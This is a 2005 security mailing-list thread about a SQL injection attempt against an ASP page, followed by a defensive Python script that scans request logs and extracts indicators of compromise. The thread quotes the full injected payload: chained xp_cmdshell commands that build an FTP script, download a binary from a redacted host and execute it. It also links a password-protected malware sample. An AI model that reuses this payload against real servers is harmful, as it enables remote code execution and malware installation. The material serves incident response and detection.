
List:       incidents
Subject:    Re: SQL injection ... another attack
From:       "Maxime Ducharme" <mducharme () cybergeneration ! com>
Date:       2005-01-20 20:49:39
Message-ID: 130701c4ff31$8f67ee50$b000a8c0 () cybergeneration ! com


I must first thank everybody who replied,
I received a lot of useful information.

This attack has been detected by our home-made
webapp security monitoring tool.

How can you tell this worked? I can assure you
it didn't.

Our firewalls also restrict outbound access,
so IRC communication couldn't work. Our servers
simply do not have Internet access; they
can only reply to opened TCP connections on
port 80.

Database Server is back-end, private IP on separate
VLAN without gateway set in IP config.

Ciao

Maxime Ducharme
Programmer / Network security specialist

----- Original Message ----- 
From: "Harlan Carvey" <keydet89@yahoo.com>
To: "gaurav kumar" <gkverma@gmail.com>; "Maxime Ducharme"
<mducharme@cybergeneration.com>
Cc: <incidents@securityfocus.com>
Sent: Thursday, January 20, 2005 1:57 PM
Subject: Re: SQL injection ... another attack


> I think the real issue here is that the SQL Injection
> worked....
>
>
> --- gaurav kumar <gkverma@gmail.com> wrote:
>
> > my VirusScan (network associates) detected it as
> > W32/Sdbot.worm.gen
> >
> >
> > On Wed, 19 Jan 2005 15:48:42 -0500, Maxime Ducharme
> > <mducharme@cybergeneration.com> wrote:
> > >
> > > Hi to the list
> > >
> > > today we received the same SQL injection attack
> > > on the same URL :
> > >
> > > IP : 24.1.139.29
> > > (c-24-1-139-29.client.comcast.net)
> > > User Agent : none sent
> > > HTTP Verb : GET /theasppage.asp?anID=
> > > Attack :
> > > 377';exec MASTER..xp_cmdshell 'mkdir
> > %systemroot%\system32\Macromed\lolx\';
> > > exec MASTER..xp_cmdshell 'echo open z.z.z.z 21 >>
> > > %systemroot%\system32\Macromed\lolx\blah.jkd';
> > > exec MASTER..xp_cmdshell 'echo USER chadicka
> > r0ckpaul >>
> > > %systemroot%\system32\macromed\lolx\blah.jkd';
> > > exec MASTER..xp_cmdshell 'echo binary >>
> > > %systemroot%\system32\macromed\lolx\blah.jkd';
> > > exec MASTER..xp_cmdshell 'echo get lol.exe
> > > %systemroot%\system32\Macromed\lolx\arcdlrde.exe
> > >>
> > > %systemroot%\system32\Macromed\lolx\blah.jkd';
> > > exec MASTER..xp_cmdshell 'echo quit >>
> > > %systemroot%\system32\Macromed\lolx\blah.jkd';
> > > exec MASTER..xp_cmdshell
> > > 'ftp.exe -i -n -v
> > -s:%systemroot%\system32\Macromed\lolx\blah.jkd';
> > > exec MASTER..xp_cmdshell 'del
> > %systemroot%\system32\Macromed\lolx\blah.jkd';
> > > exec MASTER..xp_cmdshell
> > >
> > '%systemroot%\system32\Macromed\lolx\arcdlrde.exe'--
> > >
> > > The lol.exe file can be found in this archive for
> > inspection :
> > >
> >
> http://www.cybergeneration.com/security/2005.01.19/lol.zip
> > > zip pass is das978tewa234
> > >
> > > Norton with definitions of 12 Jan. doesn't find
> > anything
> > > suspicious.
> > >
> > > I'm interested if someone does an analysis on this
> > file.
> > >
> > > Have a nice day
> > >
> > > Maxime Ducharme
> > > Programmer / Network security specialist
> > >
> > > ----- Original Message -----
> > > From: "Maxime Ducharme"
> > <mducharme@cybergeneration.com>
> > > To: <full-disclosure@lists.netsys.com>; "General
> > DShield Discussion List"
> > > <list@lists.dshield.org>;
> > <incidents@securityfocus.com>
> > > Sent: Wednesday, January 05, 2005 12:22 PM
> > > Subject: SQL injection worm ?
> > >
<snipped>
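The payload quoted in this thread is a textbook stacked-query injection: the value closes the page's string literal, chains nine `exec MASTER..xp_cmdshell` statements that write an FTP script line by line with `echo ... >>`, run `ftp.exe -s:` against it, delete the script and execute the dropped binary, then comments out the rest of the query with `--`. The following is an added example of the kind of check a web-app monitoring tool could run over request logs to flag this and pull the indicators out of it; it is not Maxime's tool, not code from the thread, and not the vulnerable ASP page. The log lines are constructed (IIS W3C-style fields), the benign client IP is a documentation address, and the `SELECT ... WHERE anID='...'` template is an assumed shape of the vulnerable query, since the post only names the parameter. The attacker IP, the redacted FTP host `z.z.z.z`, the credentials and the paths are exactly as quoted in the post. It also handles a double-percent-encoded copy of the same request, which the thread does not show.

```python
"""Flag stacked-query xp_cmdshell injection in request logs and extract its IOCs."""
import re
from urllib.parse import parse_qsl, quote, unquote

# The injected value as quoted in the thread, reassembled onto one line.
POSTED_PAYLOAD = (
    "377';exec MASTER..xp_cmdshell 'mkdir %systemroot%\\system32\\Macromed\\lolx\\';"
    "exec MASTER..xp_cmdshell 'echo open z.z.z.z 21 >> %systemroot%\\system32\\Macromed\\lolx\\blah.jkd';"
    "exec MASTER..xp_cmdshell 'echo USER chadicka r0ckpaul >> %systemroot%\\system32\\macromed\\lolx\\blah.jkd';"
    "exec MASTER..xp_cmdshell 'echo binary >> %systemroot%\\system32\\macromed\\lolx\\blah.jkd';"
    "exec MASTER..xp_cmdshell 'echo get lol.exe %systemroot%\\system32\\Macromed\\lolx\\arcdlrde.exe"
    " >> %systemroot%\\system32\\Macromed\\lolx\\blah.jkd';"
    "exec MASTER..xp_cmdshell 'echo quit >> %systemroot%\\system32\\Macromed\\lolx\\blah.jkd';"
    "exec MASTER..xp_cmdshell 'ftp.exe -i -n -v -s:%systemroot%\\system32\\Macromed\\lolx\\blah.jkd';"
    "exec MASTER..xp_cmdshell 'del %systemroot%\\system32\\Macromed\\lolx\\blah.jkd';"
    "exec MASTER..xp_cmdshell '%systemroot%\\system32\\Macromed\\lolx\\arcdlrde.exe'--"
)

def build_query(value):
    """ASSUMPTION: the ASP page concatenates anID into a quoted literal like this."""
    return "SELECT * FROM pages WHERE anID='" + value + "'"

def make_line(client_ip, anid_value):
    """Constructed IIS W3C-style line: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status."""
    return "2005-01-19 20:48:42 %s GET /theasppage.asp anID=%s 200" % (client_ip, quote(anid_value, safe=""))

# Constructed sample log: a normal request, the posted attack, and a double-encoded copy of it.
SAMPLE_LOG = [
    make_line("192.0.2.10", "377"),
    make_line("24.1.139.29", POSTED_PAYLOAD),
    make_line("24.1.139.29", quote(POSTED_PAYLOAD, safe="")),
]

LOG_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+) (\S+) (\S+) (\d{3})$")
XP_CMDSHELL_RE = re.compile(r"\bxp_cmdshell\b\s*'((?:[^']|'')*)'", re.IGNORECASE)

def fully_decode(value, rounds=3):
    """Undo repeated percent-encoding; attackers double-encode to slip past single-pass filters."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def split_statements(sql):
    """Split T-SQL on ';' outside single-quoted strings and drop a trailing -- comment."""
    stmts, buf, in_str, i = [], [], False, 0
    while i < len(sql):
        ch = sql[i]
        if ch == "'":
            if in_str and sql[i + 1:i + 2] == "'":   # '' is an escaped quote, not a terminator
                buf.append("''"); i += 2; continue
            in_str = not in_str
        elif not in_str and sql.startswith("--", i):
            break                                     # everything after -- is commented out
        if ch == ";" and not in_str:
            stmts.append("".join(buf).strip()); buf = []
        else:
            buf.append(ch)
        i += 1
    tail = "".join(buf).strip()
    if tail:
        stmts.append(tail)
    return stmts

def triage_statements(stmts):
    """Pull the OS commands out of xp_cmdshell calls, then the FTP/drop IOCs out of those commands."""
    commands = [m.group(1).replace("''", "'") for s in stmts for m in [XP_CMDSHELL_RE.search(s)] if m]
    iocs = {"ftp_server": None, "ftp_credentials": None, "download": None, "script_files": set(), "executed": []}
    for cmd in commands:
        redirect = re.search(r">>?\s*(\S+)\s*$", cmd)     # 'echo ... >> file' builds the FTP script
        if redirect:
            iocs["script_files"].add(redirect.group(1).lower())
            cmd = cmd[:redirect.start()].strip()
        low, words = cmd.lower(), cmd.split()
        if low.startswith("echo open ") and len(words) >= 3:
            port = int(words[3]) if len(words) > 3 and words[3].isdigit() else 21
            iocs["ftp_server"] = (words[2], port)
        elif low.startswith("echo user ") and len(words) >= 4:
            iocs["ftp_credentials"] = (words[2], words[3])
        elif low.startswith("echo get ") and len(words) >= 3:
            iocs["download"] = (words[2], words[3] if len(words) > 3 else words[2])
        elif not low.startswith(("echo ", "mkdir ", "del ")):
            iocs["executed"].append(cmd)               # ftp.exe -s:script and the dropped binary
    iocs["ftp_script_run"] = any("-s:" in c.lower() for c in iocs["executed"])
    return iocs

def scan_line(line):
    """Return a finding for one log line, or None when every parameter stays inside its literal."""
    m = LOG_RE.match(line)
    if not m:
        return None
    client_ip, query = m.group(3), m.group(6)
    for name, raw in parse_qsl(query, keep_blank_values=True):
        stmts = split_statements(build_query(fully_decode(raw)))
        xp_calls = [s for s in stmts if XP_CMDSHELL_RE.search(s)]
        if len(stmts) == 1 and not xp_calls:
            continue
        return {"client_ip": client_ip, "param": name, "statements": len(stmts),
                "xp_cmdshell_calls": len(xp_calls), **triage_statements(stmts)}
    return None

def scan(lines):
    return [f for f in (scan_line(l) for l in lines) if f]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The statement splitter matters more than the `xp_cmdshell` regex: by rebuilding the query the way the page would and counting statements, the check catches the general case (a value that breaks out of its literal and appends anything) rather than only this one stored-procedure name, while the IOC pass gives the responder the FTP server, credentials, script path and dropped binary to block and hunt for. Egress filtering of the kind Maxime describes is what keeps the `ftp.exe` step from succeeding even when the injection itself does.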
